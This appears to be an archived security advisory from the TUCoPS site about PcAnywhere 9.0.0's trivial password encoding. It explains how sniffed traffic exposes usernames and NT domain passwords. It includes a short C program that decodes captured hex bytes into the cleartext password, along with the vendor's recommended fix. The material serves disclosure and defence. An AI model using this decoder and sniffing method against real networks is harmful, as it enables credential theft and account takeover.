Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: pcaw5.htm

PCAnywhere 9.0.0 weak password encryption



Vulnerability

    PcAnywhere

Affected

    PcAnywhere 9.0.0

Description

    Pascal  Longpre  found  following.   PcAnywhere  9.0.0  set to its
    default security value  uses a trivial  encryption method so  user
    names and  password are  not sent  directly in  clear.  Since most
    users  have  the  encryption  methods  set  to  either  "none"  or
    "PcAnyWhere", their password are sent with weak encryption.

    A major concern lies in the fact that PcAnywhere can  authenticate
    users based on their NT  domain accounts and passwords.   When the
    user logs  on, it  is prompted  for its  NT username and password.
    They  are  then  "encrypted"  through  the  PcAnywhere  method and
    decrypted by  the host  computer for  validation by  the NT domain
    controller.   Someone  snooping  on  the  traffic  between the two
    stations will  unlock both  the PcAnywhere  and NT  account.   All
    that without even having to go through the L0phtCrack process.

    Version 7.0 is  not at risk  since no encryption  is used at  all.
    Username and password are sent in clear.  Version 8 was not tested
    yet.

    The Username / password are contained in a string two packets away
    from  the  "Enter  your  login  name"  and  "Enter  your password"
    prompts.   They are  preceded by  0x06.   The next  number is  the
    string length.  Here is the code of the exploit:

    #include <stdio.h>
    #include <string.h>
    
    void main() {
    
      char password[128];
      char cleartext[128];
      int	 i;
    
      // input the sniffed hex values here
      // Encrypted example of the 'aaaaa' password
      password[0]=0xca;
      password[1]=0xab;
      password[2]=0xcb;
      password[3]=0xa8;
      password[4]=0xca;
      password[5]='\0';
    
	    cleartext[0]=0xca-password[0]+0x61;
	    for (i=1;i<strlen(password);i++)
	      cleartext[i] = password[i-1] ^ password[i] ^ i-1;
    
	    cleartext[strlen(password)]='\0';
    
	    printf("password is %s \n",cleartext);
    
    }

Solution

    Symantec says that this was not intended to be real encryption and
    suggest the use of the Public or Symetric key option instead. More
    info can be found at:

        http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH